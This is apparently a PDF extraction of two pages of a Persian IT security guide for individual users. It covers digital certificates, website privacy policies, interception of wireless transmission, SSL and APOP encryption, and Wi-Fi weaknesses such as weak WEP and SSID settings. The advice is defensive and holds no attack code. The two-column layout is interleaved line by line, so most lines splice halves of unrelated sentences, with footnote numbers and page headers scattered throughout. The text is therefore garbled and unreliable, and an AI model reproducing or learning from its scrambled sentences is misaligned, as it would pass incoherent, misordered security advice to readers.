‫‪90‬‬ ‫‪Security Certificate‬‬ ‫‪87‬‬ ‫‪Cache‬‬
‫‪91‬‬ ‫‪Digital Signature‬‬ ‫‪88‬‬ ‫‪Temporary Internet Files‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨٨‬‬

‫ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ ،‬ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ‪.‬‬ ‫ﺑﺪﺭﺳﺘﻲ ﺑﻪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻓﺮﺩﻱ ﻛـﻪ‬
‫ﻛﻠﻴﺔ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻳﺎ ﻣـﺎﻟﻲ ﺟﻤـﻊﺁﻭﺭﻱ‬ ‫ﺩﺭﺧﻮﺍﺳﺖ ﮔﻮﺍﻫﻲ ﻧﻤﻮﺩﻩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋـﺎﻱ‬
‫ﻣﻲﻛﻨﻨـﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣﻨﺎﺳـﺐ ﻭ‬ ‫ﺁﻧﺮﺍ ﺩﺍﺭﺩ‪ .‬ﺳﭙﺲ ﺍﻳﻦ ﻣﺮﻛﺰ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺍﻣـﻀﺎ‬
‫ﺍﻋﻼﻡﺷﺪﻩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺟﺪﺍﻭﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ‬
‫ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻮﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﭘﻴﺎﻣﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴـﺪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻭ‬ ‫ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻥ ﻣﻨﻘﻀﻲ‪ ٩٢‬ﺷﺪﻩ ﻳـﺎ ﻣﺘﻌﻠـﻖ‬
‫ﻻ‬
‫ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﺭﻭ ﺑــﻪ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﻣﻌﻤــﻮ ﹰ‬ ‫ﺑﻪ ﻣﻜﺎﻥ ﺩﻳﮕﺮﻱ ﺍﺳﺖ‪ .‬ﺣﺎﻟﺖ ﺍﻭﻝ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻋﺘﺒﺎﺭ‬
‫ﻛﻢﻫﺰﻳﻨﻪﺗﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﻴﻤﻲ ﺍﺳـﺖ‪ ،‬ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺼﻮﺻﻲ‬ ‫ﮔﻮﺍﻫﻲ ﺑﺘﺎﺯﮔﻲ ﺑﻪ ﭘﺎﻳﺎﻥ ﺭﺳﻴﺪﻩ ﻭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑـﺮﺍﻱ ﺗﻤﺪﻳـﺪ ﺁﻥ‬
‫ﺭﺍﺣﺖﺗﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﻧﺼﺐ ﻣﻲﺷﻮﺩ ﻭ ﺍﺷﻜﺎﻻﺕ ﺗﻨﻈﻴﻤﻲ ﻛﻤﺘـﺮﻱ‬ ‫ﺑﺎﻳﺪ ﺗﺸﺮﻳﻔﺎﺕ ﺍﺩﺍﺭﻱ ﺗﻤﺪﻳﺪ ﮔﻮﺍﻫﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺩﻭﻡ‬
‫ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺍﺭﺍﻱ ﺩﻭ ﻣـﺸﻜﻞ ﺑـﺎﻟﻘﻮﻩ‬ ‫ﻻ ﭘﺎﻳﮕﺎﻩ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺗﻐﻴﻴـﺮ ﻧـﺎﻡ ﺩﺍﺩﻩ ﻭ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺩﺭ‬
‫ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ‪:‬‬ ‫ﮔﻮﺍﻫﻲ ﺁﻥ ﻣﻨﻌﻜﺲ ﻧﺸﺪﻩ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺧﻮﺍﺳـﺘﺎﺭ‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻴﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪.‬‬ ‫•‬
‫ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻳﻤﻨﻲ ﻫﺴﺘﻴﺪ ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﺑﺎﻳﺪ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ‬
‫ﻣﺸﻜﻞ ﺑﮕﻮﻧﻪﺍﻱ ﺭﻓﻊ ﺷﻮﺩ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺧﻮﺩ ﺑﺎ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺧﺎﺗﻤـﻪ‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻜﺎﻥ‪ ،‬ﺁﺏ ﻭ ﻫﻮﺍ‪ ،‬ﺯﻣﺎﻥ ﺭﻭﺯ‪ ،‬ﻧﺰﺩﻳـﻚ ﺑـﻮﺩﻥ‬ ‫•‬
‫ﺩﻫﻴﺪ‪.‬‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﺩﻳﻮﻳﻲ‪ ،‬ﺳﺮﻋﺖ ﺍﻧﺘﻘﺎﻝ ﺧﻂ‪ ،‬ﻛﻴﻔﻴﺖ ﻧﺼﺐ ﻭ‬
‫ﺗﺪﺍﺧﻠﻬﺎﻱ ﻣﺨﺮﺏ‪ ،‬ﺳﺮﻋﺖ ﻭ ﻛﻴﻔﻴﺖ ﺍﻧﺘﻘﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ‬ ‫ﺁﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ ﻛﺎﻓﻲ ﺍﺳﺖ؟‬
‫ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ‪.‬‬
‫ﻳﻚ ﻗﻔﻞ ﻛﻮﭼﻚ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻣـﻦ ﺩﺭ ﻭﺏ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﻭ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺩﺳﺘﺔ ﺩﻭﻡ ﻣﺸﻜﻼﺕ‪ ،‬ﻛﺎﺭ ﺯﻳﺎﺩﻱ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪.‬‬ ‫ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻧﺘﻘـﺎﻝ ﺗﻨﻬـﺎ‬
‫ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ ﺍﺯ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ‬ ‫ﻣﻮﺭﺩﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﭘﺮﺩﺍﺧـﺖ‬ ‫ﮔﻴﺮﺩ‪ .‬ﺗﻨﻬﺎ ﺩﺭﺻﺪ ﻛﻤﻲ ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻳﺎ ﺳﺮﻗﺘﻬﺎﻱ ﻫﻮﻳﺖ ﺩﺭ‬
‫ﺷﻮﻧﺪ‪ .‬ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺩﺯﺩﻱ ﻣﻴﺎﻥ ﺭﺍﻩ‪ ٩٤‬ﻧﻴﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬ ‫ﺍﺛﺮ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺍﻣﻦ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﺻﺪ ﻋﻤﺪﺓ ﻣﺴﺎﺋﻞ ﻣـﻮﺍﺭﺩﻱ‬
‫ﻣﺨﺘﻠﻒ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ )ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺷـﻬﺎﻱ‬ ‫ﻫﺴﺘﻨﺪ ﭼﻮﻥ‪:‬‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺿـــﻤﻴﻤﺔ ‪ ۱‬ﺍﺯ ﻫﻤــﻴﻦ ﺑﺨـــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻛﻨﻴـــﺪ(‪ .‬ﺍﮔـــﺮ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺍﻱ ﺩﺍﺭﻳﺪ ﻛﻪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬ ‫ﻓﻘﺪﺍﻥ ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺑﻌﻀﻲ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ؛‬ ‫•‬
‫ﻣﻲﻛﻨﺪ ﺣﺘﻤﹰﺎ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ )ﻣﺜﻞ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺷﺨﺼﻲ؛‬ ‫•‬
‫‪ .(SSL‬ﺍﮔﺮ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ POP‬ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‪.‬‬ ‫•‬
‫ﻣﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﮔﺰﻳﻨﺔ ‪ APOP‬ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻧﻤﺎﻳﻴـﺪ ﺗـﺎ ﺭﻣﺰﻫـﺎﻱ‬ ‫ﺍﺳﺘﺜﻨﺎﻱ ﺍﺻﻠﻲ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ "ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳـﻴﻢ" ﺍﺳـﺖ ﻛـﻪ ﺩﺭ‬
‫ﻋﺒﻮﺭ ﻗﺒﻞ ﺍﺯ ﺍﺭﺳﺎﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔﻲ ‪ -‬ﻣـﺴﺘﻘﻞ ﺍﺯ‬ ‫ﺑﺨﺶ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺭﺳﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ‪ -‬ﺍﻣﻨﻴﺖ ﭘﺎﻳﺎﻧﻪ ﺑﻪ ﭘﺎﻳﺎﻧﻪ‪ ٩٥‬ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔـﺮ‬
‫‪٩٣‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﻓﻨﺎﻭﺭﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻟـﺰﻭﻡ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ ﺍﺯ‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺍﺭﺗﺒﺎﻁ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻓﺮﺍﺩ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﺷﺪﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ ﺳﻴﺎﺳـﺘﻬﺎ ﻣـﺸﺨﺺ‬
‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭼـﻪ ﻧـﻮﻉ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻧﻤﻮﺩ‪ ،‬ﺑﺎ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻪ ﻛﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﺎ ﻧﻤﻲﺗﻮﺍﻥ‬

‫‪94‬‬ ‫‪Interception‬‬ ‫‪92‬‬ ‫‪Expired‬‬


‫‪95‬‬ ‫‪End-to-End Security‬‬ ‫‪93‬‬ ‫‪Privacy Policy‬‬
‫‪٨٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻦ ﺳﻴﺎﺭ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬ ‫‪ 802.11‬ﻳﺎ ‪Wi-Fi‬‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻭ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﺍﻳﻤﻦ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬
‫‪ 802.11‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ‪IEEE‬‬

‫ﺧﻄﻮﻁ ﺩﻭﺭ ﺑﺮﺩ‬ ‫ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑـﻲﺳـﻴﻢ‪ ٩٦‬ﻣـﻲﺑﺎﺷـﺪ‪ 802.11 .‬ﻛـﻪ‬
‫ﻣﻌﻤﻮ ﹰﻻ ‪ ٩٧Wi-Fi‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺑﻌﻨـﻮﺍﻥ ﺟـﺎﻳﮕﺰﻳﻦ ﺍﺗﺮﻧـﺖ‬
‫ﻻ ﺑـﺎ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻃﻮﻻﻧﻲ ﺧﺼﻮﺻﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺎﻃﻖ ﺩﻭﺭﺩﺳﺖ ﻣﻌﻤـﻮ ﹰ‬ ‫ﺳﻴﻤﻲ‪ ٩٨‬ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑـﻲﺳـﻴﻢ ﻣﻬﻴـﺎ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ ﺧﻄـﻮﻁ‬ ‫ﻣﺤﺒﻮﺑﻴﺖ ﻳﺎﻓﺘﻪ ﻭ ﻣـﺰﻳﺘﺶ ﺍﺭﺯﺍﻥ ﺑـﻮﺩﻥ ﻭ ﺳـﺮﻋﺖ ﻧـﺴﺒﻲ ﺁﻥ‬
‫ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﻪ ﭼﻨﺪﻳﻦ ﻛﺎﺭﺑﺮ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ‪.‬‬ ‫ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺍﮔﺮ ﺭﻭﺵ ﺍﻧﺘﻘﺎﻝ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻴﻢ ﺑﺎﺷـﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬـﺎﻱ‬


‫ﻣﺘﺄﺳــﻔﺎﻧﻪ ﭼﻨــﺪﻳﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺩﺭ ﺍﻏﻠــﺐ ﭘﻴــﺎﺩﻩﺳــﺎﺯﻳﻬﺎﻱ‬
‫ﺑﺸﻘﺎﺑﻲ ﻳﺎ ﺁﻧﺘﻨﻬﺎﻱ ﻳﺎﮔﻲ( ﺍﺳﺘﺮﺍﻕ ﺳـﻤﻊ ﺑـﺪﻭﻥ ﺗﺠﻬﻴـﺰﺍﺕ ﺧـﺎﺹ‬
‫‪ Wi-Fi‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑـﺼﻮﺭﺕ ﺭﻣـﺰﻱ‬ ‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺍﺻﻠﻲ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤﺌﻨﻲ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ‬ ‫•‬
‫ﺩﺭﺁﻳﻨﺪ‪.‬‬ ‫ﻧﺪﺍﺭﻧﺪ‪.‬‬

‫‪٩٩‬‬ ‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓـﺮﺩ ﺩﻳﮕـﺮﻱ‬ ‫•‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺣﻠﻘﺔ ﻣﺤﻠﻲ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺑﺎﻳﺪ ﻧـﺎﻡ ﺷـﺒﻜﺔ ﺧـﻮﺩ )‪ (SSID‬ﺭﺍ ﺍﺯ‬
‫ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﺩﺭ ﻣﻨــﺎﺯﻝ ﻭ ﺍﺩﺍﺭﺍﺕ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑﻜــﺎﺭ‬ ‫ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﻭ ﺁﻧﺮﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴـﺪ‬
‫ﻣﻲﺭﻭﺩ ﻭ ﻧﺼﺐ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺑﻲﻧﻘـﺺ ﺧﻄـﻮﻁ ﺗﻠﻔـﻦ ﺭﺍ ﻣﻴـﺴﺮ‬ ‫ﻛﻪ ﻧﺎﻡ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴـﺮ ﻣﺠـﺎﺯ ﻗﺎﺑـﻞ ﺭﺅﻳـﺖ ﻧﺒﺎﺷـﺪ‪.‬‬
‫ﻣﻲﺳﺎﺯﺩ ﻭ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺳﻴﻤﻲ ﺩﺍﺭﻧـﺪ‬ ‫ﺩﺭﺻﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ‪ SSID‬ﺭﺍ ﻣـﻲ‪-‬‬
‫ﺭﺍ ﻧﺪﺍﺭﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑـﺮﺧﻼﻑ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ‪ ،‬ﺗﺠﻬﻴـﺰﺍﺕ‬ ‫ﺩﺍﻧﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺑﺒﻴﻨﻨﺪ‪.‬‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﻴﺎﻧـﺔ ﺭﺍﻩ ﻗﺎﺑـﻞ ﺩﺯﺩﻳـﺪﻥ ﻭ ﻓـﺮﻭﺧﺘﻦ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺁﻥ )‪ (WEP‬ﺿﻌﻴﻒ ﺍﺳﺖ ﻭ ﺑﺴﺎﺩﮔﻲ‬ ‫•‬
‫ﻫﻤﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﻤﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﻮﺩﻡ ﺑـﻪ ﺍﻳـﻦ ﺧﻄـﻮﻁ‬
‫ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﻜﺴﺘﻪ ﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﻏﻴﺎﺏ ﺭﻭﺷـﻬﺎﻱ‬
‫ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺠﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺗﻲ‪ ،‬ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ‬
‫ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻗﺎﺑـﻞ‬
‫ﺍﮔﺮ ﻓﺮﺩﻱ ﻭﺍﻗﻌﹰﺎ ﺑﺨﻮﺍﻫﺪ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﺭﻣـﺰ‬
‫ﺷﻨﻮﺩ ﺑﺎﺷـﺪ‪ .‬ﺑـﺴﺘﻪ ﺑـﻪ ﻣﻮﻗﻌﻴـﺖ ﻣﺤﻠـﻲ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻱ ﻭ‬
‫ﻋﺒــﻮﺭ( ﺭﺍ ﺑﺮﺭﺳــﻲ ﻛﻨــﺪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺑــﺴﻴﺎﺭ‬
‫ﻣﻘﺮﺭﺍﺕ ﻣﺤﻠﻲ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ‪ ISP‬ﺧـﻮﺩ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
